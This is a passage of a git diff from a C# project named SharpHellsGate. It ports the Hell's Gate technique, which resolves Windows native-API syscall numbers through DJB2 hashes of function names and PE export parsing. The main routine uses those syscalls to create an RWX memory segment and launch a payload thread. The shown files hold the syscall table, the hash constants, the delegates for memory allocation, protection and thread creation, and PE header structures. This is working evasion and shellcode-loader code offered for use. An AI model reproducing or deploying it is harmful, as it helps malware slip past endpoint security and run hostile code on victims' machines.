Dictionary<UInt64, Util.APITableEntry> APITable = new Dictionary<ulong, Util.APITableEntry>() {
|
||||
{ Util.NtAllocateVirtualMemoryHash, ntdll.GetAPITableEntry(Util.NtAllocateVirtualMemoryHash) },
|
||||
{ Util.NtProtectVirtualMemoryHash, ntdll.GetAPITableEntry(Util.NtProtectVirtualMemoryHash) },
|
||||
{ Util.NtCreateThreadExHash, ntdll.GetAPITableEntry(Util.NtCreateThreadExHash) },
|
||||
{ Util.NtWaitForSingleObjectHash, ntdll.GetAPITableEntry(Util.NtWaitForSingleObjectHash) }
|
||||
};
|
||||
ntdll.Dispose();
|
||||
|
||||
Util.LogInfo($"NtAllocateVirtualMemory: 0x{APITable[Util.NtAllocateVirtualMemoryHash].Syscall:x4}");
|
||||
Util.LogInfo($"NtProtectVirtualMemory: 0x{APITable[Util.NtProtectVirtualMemoryHash].Syscall:x4}");
|
||||
Util.LogInfo($"NtWaitForSingleObject: 0x{APITable[Util.NtWaitForSingleObjectHash].Syscall:x4}");
|
||||
Util.LogInfo($"NtCreateThreadEx: 0x{APITable[Util.NtCreateThreadExHash].Syscall:x4}\n");
|
||||
|
||||
HellsGate gate = new HellsGate(APITable);
|
||||
gate.GenerateRWXMemorySegment();
|
||||
gate.Payload();
|
||||
return;
|
||||
}
|
||||
}
|
||||
}
|
|
@ -0,0 +1,18 @@
|
|||
<Project Sdk="Microsoft.NET.Sdk">
|
||||
|
||||
<PropertyGroup>
|
||||
<OutputType>Exe</OutputType>
|
||||
<TargetFramework>net5.0</TargetFramework>
|
||||
</PropertyGroup>
|
||||
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|AnyCPU'">
|
||||
<AllowUnsafeBlocks>true</AllowUnsafeBlocks>
|
||||
<PlatformTarget>x64</PlatformTarget>
|
||||
</PropertyGroup>
|
||||
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|AnyCPU'">
|
||||
<AllowUnsafeBlocks>true</AllowUnsafeBlocks>
|
||||
<PlatformTarget>x64</PlatformTarget>
|
||||
</PropertyGroup>
|
||||
|
||||
</Project>
|
|
@ -0,0 +1,128 @@
|
|||
using System;
|
||||
using System.Diagnostics;
|
||||
|
||||
namespace SharpHellsGate {
|
||||
|
||||
/// <summary>
|
||||
/// Util class. Used mainly for debug output.
|
||||
/// </summary>
|
||||
public class Util {
|
||||
|
||||
/// <summary>
|
||||
/// Structure used to store the name, address, system call and hash of a native Windows function.
|
||||
/// </summary>
|
||||
public struct APITableEntry {
|
||||
public string Name;
|
||||
public Int64 Address;
|
||||
public Int16 Syscall;
|
||||
public UInt64 Hash;
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// DJB2 Hash of the NtAllocateVirtualMemory function name.
|
||||
/// </summary>
|
||||
public static UInt64 NtAllocateVirtualMemoryHash { get; } = 0xf5bd373480a6b89b;
|
||||
|
||||
/// <summary>
|
||||
/// DJB2 Hash of the NtProtectVirtualMemory function name.
|
||||
/// </summary>
|
||||
public static UInt64 NtProtectVirtualMemoryHash { get; } = 0x858bcb1046fb6a37;
|
||||
|
||||
/// <summary>
|
||||
/// DJB2 Hash of the NtCreateThreadEx function name.
|
||||
/// </summary>
|
||||
public static UInt64 NtCreateThreadExHash { get; } = 0x64dc7db288c5015f;
|
||||
|
||||
/// <summary>
|
||||
/// DJB2 Hash of the NtWaitForSingleObject function name.
|
||||
/// </summary>
|
||||
public static UInt64 NtWaitForSingleObjectHash { get; } = 0xc6a2fa174e551bcb;
|
||||
|
||||
|
||||
/// <summary>
|
||||
/// Log an informational information.
|
||||
/// </summary>
|
||||
/// <param name="msg">Message to log.</param>
|
||||
/// <param name="indent">Indentation level.</param>
|
||||
/// <param name="prefix">Message prefix.</param>
|
||||
public static void LogInfo(string msg, int indent = 0, string prefix = "[>]") {
|
||||
#if DEBUG
|
||||
if (string.IsNullOrEmpty(msg))
|
||||
return;
|
||||
|
||||
LogMessage(msg, prefix, indent, ConsoleColor.Blue);
|
||||
#endif
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Log an error information.
|
||||
/// </summary>
|
||||
/// <param name="msg">Message to log.</param>
|
||||
/// <param name="indent">Indentation level.</param>
|
||||
/// <param name="prefix">Message prefix.</param>
|
||||
public static void LogError(string msg, int indent = 0, string prefix = "[-]") {
|
||||
#if DEBUG
|
||||
if (string.IsNullOrEmpty(msg))
|
||||
return;
|
||||
|
||||
LogMessage(msg, prefix, indent, ConsoleColor.Red);
|
||||
#endif
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Log a success information.
|
||||
/// </summary>
|
||||
/// <param name="msg">Message to log.</param>
|
||||
/// <param name="indent">Indentation level.</param>
|
||||
/// <param name="prefix">Message prefix</param>
|
||||
public static void LogSuccess(string msg, int indent = 0, string prefix = "[+]") {
|
||||
#if DEBUG
|
||||
if (string.IsNullOrEmpty(msg))
|
||||
return;
|
||||
|
||||
LogMessage(msg, prefix, indent, ConsoleColor.Green);
|
||||
#endif
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Log a string to the console and to the debugger.
|
||||
/// </summary>
|
||||
/// <param name="msg">Message to log.</param>
|
||||
/// <param name="indent">Indentation level.</param>
|
||||
/// <param name="prefix">Message prefix.</param>
|
||||
/// <param name="color">The color of the prifix on the console.</param>
|
||||
private static void LogMessage(string msg, string prefix, int indent, ConsoleColor color) {
|
||||
// Indent
|
||||
Console.Write(new String(' ', indent));
|
||||
Trace.Write(new String(' ', indent));
|
||||
|
||||
// Color and prefix
|
||||
Trace.Write(prefix);
|
||||
Console.ForegroundColor = color;
|
||||
Console.Write(prefix);
|
||||
Console.ResetColor();
|
||||
|
||||
// Message
|
||||
Console.WriteLine($" {msg}");
|
||||
Trace.WriteLine($" {msg}");
|
||||
}
|
||||
|
||||
|
||||
/// <summary>
|
||||
/// Revisited DJB2 algorithm.
|
||||
/// </summary>
|
||||
/// <param name="FunctionName">The ASCII name of a function.</param>
|
||||
/// <returns>The djb2 hash of the function name.</returns>
|
||||
public static UInt64 GetFunctionDJB2Hash(string FunctionName) {
|
||||
if (string.IsNullOrEmpty(FunctionName))
|
||||
return 0;
|
||||
|
||||
UInt64 hash = 0x7734773477347734;
|
||||
foreach (char c in FunctionName)
|
||||
hash = ((hash << 0x5) + hash) + (byte)c;
|
||||
|
||||
return hash;
|
||||
}
|
||||
|
||||
}
|
||||
}
|
|
@ -0,0 +1,93 @@
|
|||
using System;
|
||||
using System.Runtime.InteropServices;
|
||||
|
||||
namespace SharpHellsGate.Win32 {
|
||||
|
||||
/// <summary>
|
||||
/// Contains all the delegates used to execute the system calls.
|
||||
/// </summary>
|
||||
public class DFunctions {
|
||||
|
||||
/// <summary>
|
||||
/// Managed wrapper around the NtAllocateVirtualMemory native Windows function
|
||||
/// </summary>
|
||||
/// <param name="ProcessHandle">A handle for the process for which the mapping should be done.</param>
|
||||
/// <param name="BaseAddress">A pointer to a variable that will receive the base address of the allocated region of pages.</param>
|
||||
/// <param name="ZeroBits">The number of high-order address bits that must be zero in the base address of the section view.</param>
|
||||
/// <param name="RegionSize">A pointer to a variable that will receive the actual size, in bytes, of the allocated region of pages.</param>
|
||||
/// <param name="AllocationType">A bitmask containing flags that specify the type of allocation to be performed for the specified region of pages.</param>
|
||||
/// <param name="Protect">A bitmask containing page protection flags that specify the protection desired for the committed region of pages.</param>
|
||||
/// <returns>NtAllocateVirtualMemory returns either STATUS_SUCCESS or an error status code.</returns>
|
||||
[UnmanagedFunctionPointer(CallingConvention.StdCall)]
|
||||
public delegate uint NtAllocateVirtualMemory(
|
||||
IntPtr ProcessHandle,
|
||||
ref IntPtr BaseAddress,
|
||||
IntPtr ZeroBits,
|
||||
ref IntPtr RegionSize,
|
||||
UInt32 AllocationType,
|
||||
UInt32 Protect
|
||||
);
|
||||
|
||||
/// <summary>
|
||||
/// Managed wrapper around the NtProtectVirtualMemory native Windows function.
|
||||
/// </summary>
|
||||
/// <param name="ProcessHandle">Handle to Process Object opened with PROCESS_VM_OPERATION access.</param>
|
||||
/// <param name="BaseAddress">Pointer to base address to protect. Protection will change on all page containing specified address. On output, BaseAddress will point to page start address.</param>
|
||||
/// <param name="NumberOfBytesToProtect">Pointer to size of region to protect. On output will be round to page size (4KB).</param>
|
||||
/// <param name="NewAccessProtection">One or some of PAGE_... attributes.</param>
|
||||
/// <param name="OldAccessProtection">Receive previous protection.</param>
|
||||
/// <returns>NtProtectVirtualMemory returns either STATUS_SUCCESS or an error status code.</returns>
|
||||
[UnmanagedFunctionPointer(CallingConvention.StdCall)]
|
||||
public delegate uint NtProtectVirtualMemory(
|
||||
IntPtr ProcessHandle,
|
||||
ref IntPtr BaseAddress,
|
||||
ref IntPtr RegionSize,
|
||||
UInt32 NewProtect,
|
||||
out UInt32 OldProtect
|
||||
);
|
||||
|
||||
/// <summary>
|
||||
/// Managed wrapper around the NtCreateThreadEx native Windows function.
|
||||
/// </summary>
|
||||
/// <param name="hThread">Caller supplied storage for the resulting handle.</param>
|
||||
/// <param name="DesiredAccess">Specifies the allowed or desired access to the thread.</param>
|
||||
/// <param name="ObjectAttributes">Initialized attributes for the object.</param>
|
||||
/// <param name="ProcessHandle">Handle to the threads parent process.</param>
|
||||
/// <param name="lpStartAddress">Address of the function to execute.</param>
|
||||
/// <param name="lpParameter">Parameters to pass to the function.</param>
|
||||
/// <param name="CreateSuspended">Whether the thread will be in suspended mode and has to be resumed later.</param>
|
||||
/// <param name="StackZeroBits"></param>
|
||||
/// <param name="SizeOfStackCommit">Initial stack memory to commit.</param>
|
||||
/// <param name="SizeOfStackReserve">Initial stack memory to reserve.</param>
|
||||
/// <param name="lpBytesBuffer"></param>
|
||||
/// <returns>NtCreateThreadEx returns either STATUS_SUCCESS or an error status code.</returns>
|
||||
[UnmanagedFunctionPointer(CallingConvention.StdCall)]
|
||||
public delegate uint NtCreateThreadEx(
|
||||
ref IntPtr hThread,
|
||||
uint DesiredAccess,
|
||||
IntPtr ObjectAttributes,
|
||||
IntPtr ProcessHandle,
|
||||
IntPtr lpStartAddress,
|
||||
IntPtr lpParameter,
|
||||
bool CreateSuspended,
|
||||
uint StackZeroBits,
|
||||
uint SizeOfStackCommit,
|
||||
uint SizeOfStackReserve,
|
||||
IntPtr lpBytesBuffer
|
||||
);
|
||||
|
||||
/// <summary>
|
||||
/// Managed wrapper around the NtWaitForSingleObject native Windows function.
|
||||
/// </summary>
|
||||
/// <param name="ObjectHandle">Open handle to a alertable executive object.</param>
|
||||
/// <param name="Alertable">If set, calling thread is signaled, so all queued APC routines are executed.</param>
|
||||
/// <param name="TimeOuts">Time-out interval, in microseconds. NULL means infinite.</param>
|
||||
/// <returns>NtWaitForSingleObject returns either STATUS_SUCCESS or an error status code.</returns>
|
||||
[UnmanagedFunctionPointer(CallingConvention.StdCall)]
|
||||
public delegate uint NtWaitForSingleObject(
|
||||
IntPtr ObjectHandle,
|
||||
bool Alertable,
|
||||
ref Structures.LARGE_INTEGER TimeOut
|
||||
);
|
||||
}
|
||||
}
|
|
@ -0,0 +1,78 @@
|
|||
using System;
|
||||
|
||||
namespace SharpHellsGate.Win32 {
|
||||
|
||||
/// <summary>
|
||||
/// Windows Macros used for error and success codes and bitmasks.
|
||||
/// </summary>
|
||||
public static class Macros {
|
||||
|
||||
// NTSTATUS
|
||||
public static bool NT_SUCCESS(UInt32 ntstatus) => ntstatus <= 0x3FFFFFFF;
|
||||
public static bool NT_INFORMATION(UInt32 ntstatus) => ntstatus >= 0x40000000 && ntstatus <= 0x7FFFFFFF;
|
||||
public static bool NT_WARNING(UInt32 ntstatus) => ntstatus >= 0x80000000 && ntstatus <= 0xBFFFFFFF;
|
||||
public static bool NT_ERROR(UInt32 ntstatus) => ntstatus >= 0xC0000000 && ntstatus <= 0xFFFFFFFF;
|
||||
|
||||
// Common NTSTATUS
|
||||
public static UInt32 STATUS_SUCCESS { get; } = 0x00000000;
|
||||
public static UInt32 STATUS_UNSUCCESSFUL { get; } = 0xC0000001;
|
||||
public static UInt32 STATUS_NOT_IMPLEMENTED { get; } = 0xC0000002;
|
||||
|
||||
// Portable Executable
|
||||
public static Int16 IMAGE_DOS_SIGNATURE { get; } = 0x5a00 | 0x4D; // MZ
|
||||
public static Int32 IMAGE_NT_SIGNATURE { get; } = 0x00004500 | 0x00000050; // PE00
|
||||
|
||||
// Pseudo-Handles
|
||||
public static IntPtr GetCurrentProcess() => new IntPtr(-1);
|
||||
public static IntPtr GetCurrentThread() => new IntPtr(-2);
|
||||
public static IntPtr GetCurrentProcessToken() => new IntPtr(-4);
|
||||
public static IntPtr GetCurrentThreadToken() => new IntPtr(-5);
|
||||
public static IntPtr GetCurrentThreadEffectiveToken() => new IntPtr(-6);
|
||||
|
||||
// Page and Memory permissions
|
||||
public static UInt32 PAGE_NOACCESS { get; } = 0x01;
|
||||
public static UInt32 PAGE_READONLY { get; } = 0x02;
|
||||
public static UInt32 PAGE_READWRITE { get; } = 0x04;
|
||||
public static UInt32 PAGE_WRITECOPY { get; } = 0x08;
|
||||
public static UInt32 PAGE_EXECUTE { get; } = 0x10;
|
||||
public static UInt32 PAGE_EXECUTE_READ { get; } = 0x20;
|
||||
public static UInt32 PAGE_EXECUTE_READWRITE { get; } = 0x40;
|
||||
public static UInt32 PAGE_EXECUTE_WRITECOPY { get; } = 0x80;
|
||||
public static UInt32 PAGE_GUARD { get; } = 0x100;
|
||||
public static UInt32 PAGE_NOCACHE { get; } = 0x200;
|
||||
public static UInt32 PAGE_WRITECOMBINE { get; } = 0x400;
|
||||
public static UInt32 PAGE_GRAPHICS_NOACCESS { get; } = 0x0800;
|
||||
public static UInt32 PAGE_GRAPHICS_READONLY { get; } = 0x1000;
|
||||
public static UInt32 PAGE_GRAPHICS_READWRITE { get; } = 0x2000;
|
||||
public static UInt32 PAGE_GRAPHICS_EXECUTE { get; } = 0x4000;
|
||||
public static UInt32 PAGE_GRAPHICS_EXECUTE_READ { get; } = 0x8000;
|
||||
public static UInt32 PAGE_GRAPHICS_EXECUTE_READWRITE { get; } = 0x10000;
|
||||
public static UInt32 PAGE_GRAPHICS_COHERENT { get; } = 0x20000;
|
||||
public static UInt32 PAGE_ENCLAVE_THREAD_CONTROL { get; } = 0x80000000;
|
||||
public static UInt32 PAGE_REVERT_TO_FILE_MAP { get; } = 0x80000000;
|
||||
public static UInt32 PAGE_TARGETS_NO_UPDATE { get; } = 0x40000000;
|
||||
public static UInt32 PAGE_TARGETS_INVALID { get; } = 0x40000000;
|
||||
public static UInt32 PAGE_ENCLAVE_UNVALIDATED { get; } = 0x20000000;
|
||||
public static UInt32 PAGE_ENCLAVE_DECOMMIT { get; } = 0x10000000;
|
||||
public static UInt32 MEM_COMMIT { get; } = 0x00001000;
|
||||
public static UInt32 MEM_RESERVE { get; } = 0x00002000;
|
||||
public static UInt32 MEM_REPLACE_PLACEHOLDER { get; } = 0x00004000;
|
||||
public static UInt32 MEM_RESERVE_PLACEHOLDER { get; } = 0x00040000;
|
||||
public static UInt32 MEM_RESET { get; } = 0x00080000 ;
|
||||
public static UInt32 MEM_TOP_DOWN { get; } = 0x00100000;
|
||||
public static UInt32 MEM_WRITE_WATCH { get; } = 0x00200000;
|
||||
public static UInt32 MEM_PHYSICAL { get; } = 0x00400000;
|
||||
public static UInt32 MEM_ROTATE { get; } = 0x00800000;
|
||||
public static UInt32 MEM_DIFFERENT_IMAGE_BASE_OK { get; } = 0x00800000;
|
||||
public static UInt32 MEM_RESET_UNDO { get; } = 0x01000000;
|
||||
public static UInt32 MEM_LARGE_PAGES { get; } = 0x20000000;
|
||||
public static UInt32 MEM_4MB_PAGES { get; } = 0x80000000;
|
||||
public static UInt32 MEM_64K_PAGES { get; } = (MEM_LARGE_PAGES | MEM_PHYSICAL);
|
||||
public static UInt32 MEM_UNMAP_WITH_TRANSIENT_BOOST { get; } = 0x00000001;
|
||||
public static UInt32 MEM_COALESCE_PLACEHOLDERS { get; } = 0x00000001;
|
||||
public static UInt32 MEM_PRESERVE_PLACEHOLDER { get; } = 0x00000002;
|
||||
public static UInt32 MEM_DECOMMIT { get; } = 0x00004000;
|
||||
public static UInt32 MEM_RELEASE { get; } = 0x00008000;
|
||||
public static UInt32 MEM_FREE { get; } = 0x00010000;
|
||||
}
|
||||
}
|
|
@ -0,0 +1,128 @@
|
|||
using System;
|
||||
using System.Runtime.InteropServices;
|
||||
|
||||
namespace SharpHellsGate.Win32 {
|
||||
public static class Structures {
|
||||
|
||||
[StructLayout(LayoutKind.Sequential, Pack = 1)]
|
||||
public struct IMAGE_DOS_HEADER {
|
||||
public UInt16 e_magic; /*+0x000*/
|
||||
public UInt16 e_cblp; /*+0x002*/
|
||||
public UInt16 e_cp; /*+0x004*/
|
||||
public UInt16 e_crlc; /*+0x006*/
|
||||
public UInt16 e_cparhdr; /*+0x008*/
|
||||
public UInt16 e_minalloc; /*+0x00a*/
|
||||
public UInt16 e_maxalloc; /*+0x00c*/
|
||||
public UInt16 e_ss; /*+0x00e*/
|
||||
public UInt16 e_sp; /*+0x010*/
|
||||
public UInt16 e_csum; /*+0x012*/
|
||||
public UInt16 e_ip; /*+0x014*/
|
||||
public UInt16 e_cs; /*+0x016*/
|
||||
public UInt16 e_lfarlc; /*+0x018*/
|
||||
public UInt16 e_ovno; /*+0x01a*/
|
||||
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
|
||||
public UInt16[] e_res; /*+0x01c*/
|
||||
public UInt16 e_oemid; /*+0x024*/
|
||||
public UInt16 e_oeminfo; /*+0x026*/
|
||||
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
|
||||
public UInt16[] e_res2; /*+0x028*/
|
||||
public UInt32 e_lfanew; /*+0x03c*/
|
||||
}
|
||||
|
||||
[StructLayout(LayoutKind.Sequential, Pack = 1)]
|
||||
public struct IMAGE_FILE_HEADER {
|
||||
public UInt16 Machine; /*+0x000*/
|
||||
public UInt16 NumberOfSections; /*+0x002*/
|
||||
public UInt32 TimeDateStamp; /*+0x004*/
|
||||
public UInt32 PointerToSymbolTable; /*+0x008*/
|
||||
public UInt32 NumberOfSymbols; /*+0x00c*/
|
||||
public UInt16 SizeOfOptionalHeader; /*+0x010*/
|
||||
public UInt16 Characteristics; /*+0x012*/
|
||||
}
|
||||
|
||||
[StructLayout(LayoutKind.Sequential, Pack = 1)]
|
||||
public struct IMAGE_DATA_DIRECTORY {
|
||||
public UInt32 VirtualAddress; /*+0x000*/
|
||||
public UInt32 Size; /*+0x004*/
|
||||
}
|
||||
|
||||
[StructLayout(LayoutKind.Sequential, Pack = 1)]
|
||||
public struct IMAGE_OPTIONAL_HEADER64 {
|
||||
public UInt16 Magic; /*+0x000*/
|
||||
public Byte MajorLinkerVersion; /*+0x002*/
|
||||
public Byte MinorLinkerVersion; /*+0x003*/
|
||||
public UInt32 SizeOfCode; /*+0x004*/
|
||||
public UInt32 SizeOfInitializedDatal; /*+0x008*/
|
||||
public UInt32 SizeOfUninitializedData; /*+0x00c*/
|
||||
public UInt32 AddressOfEntryPoint; /*+0x010*/
|
||||
public UInt32 BaseOfCode; /*+0x014*/
|
||||
public UInt64 ImageBasel; /*+0x018*/
|
||||
public UInt32 SectionAlignment; /*+0x020*/
|
||||
public UInt32 FileAlignment; /*+0x024*/
|
||||
public UInt16 MajorOperatingSystemVersion; /*+0x028*/
|
||||
public UInt16 MinorOperatingSystemVersion; /*+0x02a*/
|
||||
public UInt16 MajorImageVersion; /*+0x02c*/
|
||||
public UInt16 MinorImageVersion; /*+0x02e*/
|
||||
public UInt16 MajorSubsystemVersion; /*+0x030*/
|
||||
public UInt16 MinorSubsystemVersion; /*+0x032*/
|
||||
public UInt32 Win32VersionValue; /*+0x034*/
|
||||
public UInt32 SizeOfImage; /*+0x038*/
|
||||
public UInt32 SizeOfHeaders; /*+0x03c*/
|
||||
public UInt32 CheckSum; /*+0x040*/
|
||||
public UInt16 Subsystem; /*+0x044*/
|
||||
public UInt16 DllCharacteristics; /*+0x046*/
|
||||
public UInt64 SizeOfStackReserve; /*+0x048*/
|
||||
public UInt64 SizeOfStackCommit; /*+0x050*/
|
||||
public UInt64 SizeOfHeapReserve; /*+0x058*/
|
||||
public UInt64 SizeOfHeapCommit; /*+0x060*/
|
||||
public UInt32 LoaderFlags; /*+0x068*/
|
||||
public UInt32 NumberOfRvaAndSizes; /*+0x06c*/
|
||||
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
|
||||
public IMAGE_DATA_DIRECTORY[] DataDirectory; /*+0x070*/
|
||||
}
|
||||
|
||||
[StructLayout(LayoutKind.Sequential, Pack = 1)]
|
||||
public struct IMAGE_NT_HEADERS64 {
|
||||
public UInt32 Signature; /*+0x000*/
|
||||
public IMAGE_FILE_HEADER FileHeader; /*+0x004*/
|
||||
public IMAGE_OPTIONAL_HEADER64 OptionalHeader; /*+0x018*/
|
||||
}
|
||||
|
||||
[StructLayout(LayoutKind.Sequential, Pack = 1)]
|
||||
public struct IMAGE_EXPORT_DIRECTORY {
|
||||
public UInt32 Characteristics; /*+0x000*/
|
||||
public UInt32 TimeDateStamp; /*+0x004*/
|
||||
public UInt16 MajorVersion; /*+0x008*/
|
||||
public UInt16 MinorVersion; /*+0x00a*/
|
||||
public UInt32 Name; /*+0x00c*/
|
||||
public UInt32 Base; /*+0x010*/
|
||||
public UInt32 NumberOfFunctions; /*+0x014*/
|
||||
public UInt32 NumberOfNames; /*+0x018*/
|
||||
public UInt32 AddressOfFunctions; /*+0x01c*/
|
||||
public UInt32 AddressOfNames; /*+0x020*/
|
||||
public UInt32 AddressOfNameOrdinals; /*+0x024*/
|
||||
}
|
||||
|
||||
[StructLayout(LayoutKind.Sequential, Pack = 1)]
|
||||
public struct IMAGE_SECTION_HEADER {
|
||||
[MarshalAs(UnmanagedType.ByValTStr, SizeConst = 8)]
|
||||
public string Name; /*+0x000*/
|
||||
public UInt32 Misc; /*+0x008*/
|
||||
public UInt32 VirtualAddress; /*+0x00c*/
|
||||
public UInt32 SizeOfRawData; /*+0x010*/
|
||||
public UInt32 PointerToRawData; /*+0x014*/
|
||||
public UInt32 PointerToRelocations; /*+0x018*/
|
||||
public UInt32 PointerToLinenumbers; /*+0x01c*/
|
||||
public UInt16 NumberOfRelocations; /*+0x020*/
|
||||
public UInt16 NumberOfLinenumbers; /*+0x022*/
|
||||
public UInt32 Characteristics; /*+0x024*/
|
||||
}
|
||||
|
||||
[StructLayout(LayoutKind.Explicit, Size = 1)]
|
||||
public struct LARGE_INTEGER {
|
||||
[FieldOffset(0)] public Int64 QuadPart; /*+0x000*/
|
||||
[FieldOffset(0)] public UInt32 LowPart; /*+0x000*/
|
||||
[FieldOffset(4)] public UInt32 HighPart; /*+0x004*/
|
||||
}
|
||||
}
|
||||
}
|
Binary file not shown.
Loading…
Reference in New Issue